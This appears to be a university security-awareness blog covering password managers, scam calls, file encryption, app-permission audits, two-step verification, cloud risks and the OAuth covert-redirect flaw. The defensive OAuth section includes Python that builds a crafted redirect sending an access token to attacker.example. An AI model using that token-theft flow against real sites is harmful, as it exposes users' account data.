Information Security News and Events
News, events, views, tips, and hints for keeping your personal information private.
Wednesday, May. 27, 2015
What is a Password Manager Tool?
A password manager tool is software that encrypts, stores, and manages passwords on the user's behalf. The tool also helps users create strong passwords and log in to websites automatically.
Who Might Use a Password Manager Tool and Why?
People should use a unique password for every website or system they log in to, so that a breach of one site does not expose their accounts elsewhere. However, most users cannot remember a separate password for many sites and tend to reuse the same password or write them on sticky notes attached to their computer. Password manager tools let users manage many distinct passwords more securely and log them in to websites automatically.
Benefits to Using a Password Manager Tool
Password manager tools enable users to create and securely maintain unique passwords for websites and other systems without having to memorize or write down passwords.
Risks to Consider When Using a Password Manager Tool
Special care should be taken to secure the password manager itself, since whoever controls it has every stored password. The "master" password that unlocks the tool should be very strong, long, and unique, and multifactor authentication should be enabled if the tool offers it. Also consider whether you want the tool to store the password database locally or in the cloud.
List of Technology/Tools That a User Might Consider
Below are three popular password manager tools that an end user might consider for use. Users should evaluate which tool works best for their own unique purposes. The Information Security Office does not recommend the use of a particular tool. End users employ these tools at their own risk.
LastPass is easy to use, supports most popular browsers and mobile devices, offers multifactor authentication options for the master password, sends notifications for hacked sites, never sends your encryption key to LastPass (the vault is encrypted and decrypted on your own device), provides a password strength indicator, and performs additional checks such as flagging the same password used across multiple sites. The price of this convenience is that the password database must be stored in LastPass's cloud: as a web-based tool, your (encrypted) vault can be downloaded by anyone in the world with an Internet connection and your master password. For this reason, it is strongly recommended that you use multifactor authentication.
KeePass never sends your encryption keys anywhere, provides a password strength indicator, and keeps the password database only where you put it, not in the cloud. Using it across multiple devices is a little more work, since you must copy or synchronize the database file yourself.
1Password does not share your encryption keys with the vendor, provides a password strength indicator, and lets the password database be stored in Apple's iCloud, in Dropbox, or locally on your own devices. Using it across multiple devices is easiest when the database is stored in the cloud, but storing it locally is more secure. The iOS version can be configured to unlock with Touch ID on compatible devices.
Higher Education Reference Pages
University of Illinois at Urbana-Champaign
Adapted with permission from EDUCAUSE and the Higher Education Information Security Council
*not written by the author
Wednesday, Apr. 29, 2015
Cyber criminals don't just send you fraudulent (phishing) email messages and set up fake websites; they may also call you on the phone. Often they offer to fix your (nonexistent) computer problems or sell you a software license. The most common phone scam is the tech support scam. The callers can be very persuasive in getting you to trust them: they might know your name and other personal information gathered from public phone directories or other research, and they might even guess which operating system you're using. Once they have gained your trust, they will ask for your username and password, or ask you to go to a website and install software that lets them access your computer to "fix" it. Once you do this, your computer and your personal information are exposed.
Once they have access to your computer, they can:
- Trick you into installing malicious software that could capture sensitive data, such as online banking user names and passwords. They might also then charge you to remove this software.
- Take control of your computer remotely and adjust settings to leave your computer vulnerable.
- Request credit card information so they can bill you for phony services.
- Direct you to fraudulent websites and ask you to enter credit card and other personal or financial information there.
So how can I protect myself from phone tech support scams?
- If you think you have received a fraudulent phone call:
  - Do not purchase any software or services.
  - Ask if there is a fee or subscription associated with the "service." If there is, hang up.
  - Never give control of your computer to a third party unless you can confirm that the caller is a legitimate representative of a computer support team with whom you are already a customer.
  - Take down the caller's information and report it immediately to your local authorities.
  - Never provide your credit card or financial information.
Friday, Feb. 20, 2015
Need to encrypt your files, but don't have the software to do it? LOOK NO FURTHER! I am here to show you how to encrypt your files!
If you are a Mac user, please follow this link to encrypt your files, because the software I will be talking about is for Windows users. Alternatively, you can download Keka, a free file archiver for Mac OS X, and follow its instructions.
If you are a Windows user, please keep reading. If you use Linux, you can search for instructions or follow one of these links: (option 1) or (option 2).
Let's get started. The software that I will be talking about is called 7-Zip.
7-Zip is open source software that compresses ("zips") files into archives that can be protected with encryption. Alternatively, you can use WinZip. To download 7-Zip, follow the link.
After the software has been installed, you can encrypt a file or folder:
Right click on the file/folder to be encrypted.
Select "7-Zip" and then "Add to archive"
Change the name of the archive you wish to create.
Change the Archive format to "Zip".
Change the Encryption method to "AES-256". You can also select ZipCrypto, but AES-256 is far more secure: ZipCrypto is the original PKZIP stream cipher and is known to be breakable (a few bytes of known plaintext, such as a file's standard header, are enough to recover the key), so it only keeps out the casual snoop. However, if AES-256 is selected, the recipient of the zip file will have to install 7-Zip or another zip program that supports AES to open it. Selecting ZipCrypto lets the recipient open the zip file in Windows Explorer without an extra program.
I strongly recommend that you use AES-256 to protect your data. Note that with the Zip format, either option encrypts only the file contents: the file names inside the archive stay readable by anyone who opens the archive. If the names themselves are sensitive, choose the "7z" archive format instead and tick "Encrypt file names"; the recipient then needs 7-Zip.
Enter a strong password. Here are some tips on how to create a strong password: (option 1) or (option 2).
Select "OK" to create the encrypted archive. The archive is placed in the same folder as the original. The original, unencrypted file is left in place, so delete it (or tick "Delete files after compression") if only the encrypted copy should remain.
You have encrypted your file! Congratulations!
*To open the archive, you just need to enter the password when prompted.
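For readers who prefer the command line, here is the same procedure as an added example (not part of the original post), using the real 7-Zip CLI switches: `-tzip -mem=AES256` is the "Zip" + "AES-256" choice from the dialog, and `-t7z -mhe=on` is the 7z format with "Encrypt file names". The sample file, archive names and password are made up for the demonstration, and the binary name (7z, 7za or 7zz) depends on your package.

```shell
#!/bin/sh
# Added example, not from the original post: the command-line equivalent of the
# GUI steps above. Requires the 7-Zip CLI (p7zip on Linux/macOS, 7-Zip on Windows).
set -e

SEVENZIP=$(command -v 7z || command -v 7za || command -v 7zz || true)
[ -n "$SEVENZIP" ] || echo "7-Zip CLI not found; install p7zip or 7-Zip to run the demo" >&2

# "Add to archive", format Zip, encryption method AES-256.
# 7-Zip takes the password on the command line, which other users of the same
# machine can see via ps: fine on a personal PC, not on a shared host.
make_encrypted_zip() {            # usage: make_encrypted_zip out.zip file...
    archive=$1; shift
    "$SEVENZIP" a -tzip -mem=AES256 -p"$ZIP_PASSWORD" "$archive" "$@" >/dev/null
}

# Report the method 7-Zip recorded for the entries: "AES-256" (strong) or
# "ZipCrypto" (the weak legacy cipher). No password is needed, because the
# Zip format never encrypts the archive's directory.
zip_entry_methods() {             # usage: zip_entry_methods archive.zip
    "$SEVENZIP" l -slt "$1" | awk 'f && /^Method = / {print $3} /^-+$/ {f=1}' | sort -u
}

# List the file names inside the archive, again without the password, to show
# that Zip encryption protects contents only.
zip_entry_names() {               # usage: zip_entry_names archive.zip
    "$SEVENZIP" l -slt "$1" | awk 'f && /^Path = / {sub(/^Path = /, ""); print} /^-+$/ {f=1}'
}

# Test the archive with $ZIP_PASSWORD: exit status 0 only if it decrypts.
verify_password() {               # usage: verify_password archive
    "$SEVENZIP" t -p"$ZIP_PASSWORD" "$1" >/dev/null 2>&1
}

# The 7z-format alternative: -mhe=on encrypts the file names too, so even a
# listing needs the password.
make_encrypted_7z() {             # usage: make_encrypted_7z out.7z file...
    archive=$1; shift
    "$SEVENZIP" a -t7z -mhe=on -p"$ZIP_PASSWORD" "$archive" "$@" >/dev/null
}

demo() {
    workdir=$(mktemp -d)
    cd "$workdir"
    printf 'account number 1234-5678\n' > secret.txt   # constructed sample file
    ZIP_PASSWORD='correct horse battery staple'
    make_encrypted_zip secret.zip secret.txt
    echo "methods used:  $(zip_entry_methods secret.zip)"
    echo "visible names: $(zip_entry_names secret.zip)"
    if verify_password secret.zip; then echo "password accepted"; fi
    make_encrypted_7z secret.7z secret.txt
    if ! "$SEVENZIP" l -pwrong-guess secret.7z >/dev/null 2>&1; then
        echo "7z with -mhe=on: listing refused without the password"
    fi
    cd / && rm -rf "$workdir"
}

if [ -n "$SEVENZIP" ]; then demo; fi
```

Run it with `sh encrypt-demo.sh`; the listing step is the check worth remembering: a Zip archive reveals its file names to anyone, password or not, while the 7z archive with encrypted headers refuses to list at all.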
Monday, Nov. 10, 2014
Join the Information Security Office and the Markkula Center for Applied Ethics this Thursday for "Treats for Password Changes". Protect your privacy by changing your password and get a treat in return! Cookie Monster approves! #freecookies
Wednesday, Oct. 8, 2014
Free Document Shredding
DATE: Tuesday, Oct 21 - Thursday, Oct 23
TIME: 11:00AM - 1:30PM
WHERE: The shred truck will be parked on Sherman St. in front of Campus Safety Services.
Purpose: Bring your sensitive and outdated paper documents, CDs, and DVDs for secure destruction
Reasons to Shred:
- Shredding keeps personal information confidential
- Shredding helps prevent identity theft and fraud
- Shredding keeps business information confidential
- Shredding is environmentally friendly
- Documents are recycled, saving trees and energy
- Less waste goes to landfills
- Shredding helps organizations comply with Federal and State laws, as well as Industry regulations
- FERPA - Family Educational Rights and Privacy Act
- Protects student information
- HIPAA - Health Insurance Portability and Accountability Act
- Protects patient information
- FACTA - Fair and Accurate Credit Transactions Act
- Protects credit card holder information
- GLBA - Gramm-Leach-Bliley Act
- Protects financial information
- SOX - Sarbanes-Oxley Act
- Protects stockholder information
- PCI-DSS - Payment Card Industry Data Security Standard
- Protects payment card (cardholder) data
What should I shred?
- Deposit, ATM, credit card and debit card receipts
- Credit card and bank account statements
- Credit card contracts and other loan agreements
- Documentation of a purchase or sale of stocks, bonds and other investments
- Utility or monthly bills
- Legal files
- Paycheck stubs
- Computer discs
- Computer CDs/DVDs
- Personnel records
- Credit reports
- Tax records
- Bank statements
- Legal contracts
- Medical records
- Real estate forms
*Shred Fest is Powered by Pantera Shredding Services
Monday, Jun. 30, 2014
While social media sites such as Facebook and Twitter make it easy to share things with your friends, they also make it easy to log in to other services and applications. Acting as authentication brokers, these sites allow their users to sign in to third-party sites with their social media credentials. All the user has to do is give those sites permission to access their profile data.
Facebook is a full-blown apps ecosystem. You may have added an app for a promotion or contest, played a game, or added new functionality such as music streaming. In most cases, it just means the app developer has access to some of your profile data. In the worst-case scenario, a malicious developer behind the service can use your account to send out spam.
When was the last time you checked which apps have access to your Facebook and Twitter accounts? If you are like most Internet users, you are probably long overdue for a cleanup.
Below are the steps for performing an audit. An audit lets you review every app on your account and decide whether it should still have access.
To see the list of apps on Facebook, click the gear icon in the top right corner of the screen and then Privacy Settings. Clicking Apps in the left column brings up the App Settings page.
The Apps you use section displays all the applications that have access to the account. You can remove applications you are no longer using by clicking on the “x” for each row. If you are still using the app, click on Edit to make sure you are okay with the information the app is collecting and has access to.
Next, check the Apps others use (underneath Apps you use) setting as well, since apps, games, and websites your friends are using can also access your personal details, photos and updates. In this section, you can select which pieces of information your friends’ apps can access. You may not be comfortable with an app you are not using having access to your data. This is your chance to do something about it.
If you are adamant about not using Facebook apps at all, there is another option. After removing every app, click Edit and turn the platform off. If you do so, you won't be able to log in to sites using Facebook or add any apps until you turn it back on.
To view all the apps that have access to your Twitter account, click the gear icon in the top right corner of the Twitter home page, choose Edit Profile in the drop-down menu, and then click Apps in the profile page's left column.
This displays a list of applications you’ve granted access to your Twitter account. Are you surprised by the number of apps here? Revoke access to apps that you don’t recognize, or know that you no longer use. If you aren’t sure, remove them anyway. The worst thing that can happen is that the app will prompt you to re-authorize it the next time you need it. And if you never get prompted, then you clearly weren’t using it.
You can revoke an app simply by clicking on the Revoke access button next to each app name. If you make a mistake, you can always re-enable access by clicking on the Undo Revoke Access button.
By doing this you reduce the risk of unauthorized use of these apps, cut down on the chances of spammers taking over your account, and even remind yourself of tools and services you may have forgotten about. It's a good idea to review your apps regularly; whether that's once a quarter, twice a year, or annually depends entirely on your app usage. Just don't neglect this aspect of maintenance. Your data will thank you.
Tuesday, May. 27, 2014
Early Tuesday, a number of Australian iPhone and iPad owners awoke to find their devices locked, with an alert asking for $50 to $100 to give access back.
Moral: It's easier than you think for someone to get into your Apple devices, even when the thief doesn't have the actual iPhone in hand: your Apple ID password is enough.
How to make yourself much safer?
Start using two-step verification for your Apple ID.
When you enable two-step verification, Apple makes you prove you are really you whenever you buy anything on iTunes, the App Store or the iBooks Store. It works like this: Apple texts a code to your trusted device whenever you try to sign in to your Apple account to make a purchase, and you must enter that code to verify your identity. That way, nobody else can access your account unless they have both your password and your device, which makes it far more difficult to steal your identity and credit card information.
Here's how you do it:
First, go to the Apple ID site, click "Manage your Apple ID" and sign in. From there, click "Password and Security."
From there, you'll see "Two-Step Verification." Under that you should click "Get started..."
There you'll be able to sign up for two-step verification. For security reasons, Apple makes you wait three days after setting up two-step verification for it to take effect. Once you sign up, you'll get an email telling you exactly when you'll be able to use it.
Once two-step verification is active, signing in to make a purchase works as described above: you enter your password, then the code Apple sends to your trusted device.
You'll also get a Recovery Key, a 14-character string of numbers and letters that you can use to get back into your account if you ever lose access to your iPhone and cannot receive text messages. Apple recommends you print out your Recovery Key and keep it in a safe place.
Many people don't think about Apple security, even though their devices and accounts can contain a ton of personal information. Half of iPhone users don't even use their phone's regular passcode, and some people probably still haven't updated their iPhones after the major SSL/TLS flaw discovered in February. Two-step verification is just one extra way you can protect yourself.
Wednesday, May. 21, 2014
The term "the cloud" can be used to refer to the Internet. Marketers have popularized the phrase "in the cloud" to refer to software, platforms, and infrastructure that are sold as a service. Usually, the seller has servers that host products and services from a remote location, so users don't have to. They can just log on to the network without installing anything. These services may be offered in a public, private, or mixed network. Google, Amazon, IBM, Oracle Cloud, Microsoft Azure, and Dropbox are some examples of cloud vendors.
Cloud services have grown along with Internet use. They can be quite useful as a cheap "offsite backup", for example to keep copies of documents or a list of the serial numbers of your belongings in case of a burglary or a catastrophic event such as an earthquake.
Let's use Dropbox for an example.
Dropbox normally requires a username and password to access documents, and it even offers two-factor authentication as an option. However, a user can let others view a document by sending them a "secret link", and links leak easily (through forwarded email, browser history, or the referer header sent when someone follows a link out of the document). As users rely more on cloud services to share files, and find per-file passwords too troublesome to set up, leaked links will become more commonplace.
Let's assume the cloud service works as designed and your username and password are strong enough. When you share files with other people, you still run the risk that they won't take the same care with the files as you do: their passwords could be weaker than yours, or they could post the link on the Internet.
Although cloud services are useful, some information simply shouldn't be stored in the cloud, such as confidential, personal, financial, or medical information, unless you encrypt it before uploading.
Here are a couple of ways to "de-cloud" your life:
- Set up an "ownCloud" server. It works much like Dropbox, with mobile clients available for Android and iOS, but you have to run the server yourself. I suggest making it reachable only over a VPN connection. SharePoint may be a similar solution for Windows shops.
- Run your own mail server. This can be a real pain, and even large companies are moving mail to cloud providers. But nearly all cloud mail providers store your messages in a form they can read, and in many ways they have to (spam filtering and search depend on it). Systems that provide real end-to-end encryption for cloud/web-based e-mail are still experimental at this point.
- Offsite backup at a friend's or relative's house. With high-speed home connections now widespread, you can set up a decent offsite backup by "co-locating" a simple NAS somewhere. The disks on the NAS can be encrypted, and again the connection can go over a VPN.
- For Apple users, make local backups of your devices instead of using iCloud. iCloud backups are encrypted, but with keys that Apple holds, so all it takes for an attacker to retrieve a backup is your iCloud username and password. When backing up locally, tick "Encrypt local backup" in iTunes so the copy on your computer is protected too.
Monday, May. 12, 2014
Recently, some people at SCU have gotten unsolicited phone calls offering to fix their computers. If that happened to you, make sure you do not do anything the caller asks you to do. It is most likely a phone scam. Even if you wouldn't be fooled, please warn friends and relatives (especially elderly ones) who might not be aware of scams like this. Victims of this fraud can suffer anything from identity theft to having their computer hijacked and used to send spam or viruses without their knowledge.
Where to Report Phone Fraud
- National Do Not Call Registry
The U.S. National Do Not Call Registry allows you to register your phone number. U.S. telemarketers are legally required to check this list; if they call numbers on it, they're liable for prosecution. Enforcement isn't great, but every bit helps.
- FTC Bureau of Consumer Protection - Consumer Information
The Federal Trade Commission doesn't resolve individual consumer complaints, but if there are enough reports of the same fraud, it may be able to go after the scam and shut it down.
What If They Put a Virus on My Computer?
Wednesday, May. 7, 2014
Login flows used by Facebook, Google, and many other popular websites could be redirected by attackers.
A security researcher has uncovered serious security vulnerabilities in the technologies many websites use to authenticate users via third-party sites. A blog post published late last week revealed the details of security flaws in OAuth 2.0 and OpenID, two technologies widely used by the Web's most popular sites to verify a user's identity more quickly and easily.
The vulnerability was discovered by Wang Jing, a PhD student in mathematics at Nanyang Technological University. If you have ever allowed an application or website to verify your identity using your Facebook, Twitter, or Google account, then you have likely used OAuth or OpenID.
OAuth is an open standard for authorization that gives client applications delegated access to server resources on behalf of a resource owner. OpenID is an open standard that lets users be authenticated by cooperating sites using a third-party service, eliminating the need for webmasters to provide their own authentication systems and allowing users to consolidate their digital identities. The vulnerability could allow an attacker to redirect the "token" OAuth 2.0 uses to access user information on a third-party site, making it possible to steal information such as a user's email address, age, or location, the blog says. In OpenID, the vulnerability could let attackers collect the user's information directly. The attack works when the identity provider accepts any redirect_uri on the client site's domain rather than an exact, pre-registered URL, and the client site has an "open redirector" (a page that forwards the browser to whatever URL a parameter names): the provider sends the token to the client's redirector, which forwards it on to the attacker.
Google (which uses OpenID) said the problem is being tracked, LinkedIn said it has published a blog post on the matter, and Microsoft said it had investigated and that the vulnerability existed on a third party's domain and not on its own sites.
While this issue isn't as severe as Heartbleed, it is relatively easy to exploit until it is fixed, and fixing it is difficult because third-party sites have "little incentive" to close their open redirects. Cost is a factor, as is the view that the identity provider (such as Facebook) bears the responsibility, since its domain is what makes the attack look credible.
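To make the mechanism concrete, here is an added example (not from the original post or the researcher's write-up) that simulates the two pieces the attack needs and the fix on the provider side. The identity provider is modelled with a loose redirect_uri check (same host as the registered URI is enough) and with the strict check RFC 6749 section 3.1.2.3 requires (simple string comparison against the pre-registered URI). The hosts idp.example, client.example and attacker.example, the client ID, the /go?to= redirector path and the token value are all hypothetical.

```python
"""Added example (not from the original post): simulate how a loosely validated
redirect_uri at an OAuth 2.0 provider, combined with an open redirector on the
client site, hands the access token to an attacker, and how exact matching of
the pre-registered redirect URI stops it. All hosts, IDs and tokens are made up."""
from urllib.parse import parse_qs, urlencode, urlparse, urlunparse

# Hypothetical client registration held by the provider (idp.example).
REGISTERED_CLIENTS = {
    "client-123": ["https://client.example/oauth/callback"],
}


def redirect_uri_allowed(client_id, requested, strict):
    """Decide whether the provider will honour `requested` as the redirect target.

    strict=False reproduces the loose check described in the article: anything
    on the registered host is accepted.  strict=True is simple string comparison
    against the registered URI, which is what RFC 6749 section 3.1.2.3 requires."""
    registered_uris = REGISTERED_CLIENTS.get(client_id, [])
    req = urlparse(requested)
    if req.scheme != "https":
        return False
    for registered in registered_uris:
        if strict:
            if requested == registered:
                return True
        elif req.netloc == urlparse(registered).netloc:
            return True
    return False


def idp_authorize(client_id, redirect_uri, strict, token="tok_s3cret"):
    """Implicit-grant authorization endpoint.  On success it returns the Location
    header the browser will follow: redirect_uri with the access token in the URL
    fragment.  Returns None if the request is refused."""
    if not redirect_uri_allowed(client_id, redirect_uri, strict):
        return None
    return redirect_uri + "#" + urlencode({"access_token": token, "token_type": "bearer"})


def client_open_redirector(location):
    """Simulate https://client.example/go?to=<url>, a page that 302-redirects to
    whatever `to` says.  Browsers carry the fragment of the current URL over to a
    redirect target that has no fragment of its own, so the token travels along.
    Any other URL on client.example is returned unchanged (no redirect happens)."""
    url = urlparse(location)
    if url.netloc != "client.example" or url.path != "/go":
        return location
    target = parse_qs(url.query).get("to", [None])[0]
    if target is None:
        return location
    hop = urlparse(target)
    if not hop.fragment and url.fragment:
        hop = hop._replace(fragment=url.fragment)
    return urlunparse(hop)


def token_receiver(strict):
    """Run the attacker's crafted authorize request end to end and report which
    host ends up holding the token: 'attacker.example' under the loose check,
    None when the provider refuses the crafted redirect_uri."""
    crafted = "https://client.example/go?" + urlencode(
        {"to": "https://attacker.example/collect"})
    location = idp_authorize("client-123", crafted, strict)
    if location is None:
        return None
    final = urlparse(client_open_redirector(location))
    return final.netloc if "access_token=" in final.fragment else None


if __name__ == "__main__":
    print("loose redirect_uri check: token lands on", token_receiver(strict=False))
    print("strict redirect_uri check: token lands on", token_receiver(strict=True))
    # The legitimate client flow still works under the strict check.
    print(idp_authorize("client-123", "https://client.example/oauth/callback", strict=True))
```

Two things the simulation shows that the prose does not: the client site never has to be compromised, only to host an open redirector, and the provider's exact-match check alone is enough to refuse the crafted request, which is why the fix belongs with the identity provider as well as with the third-party sites.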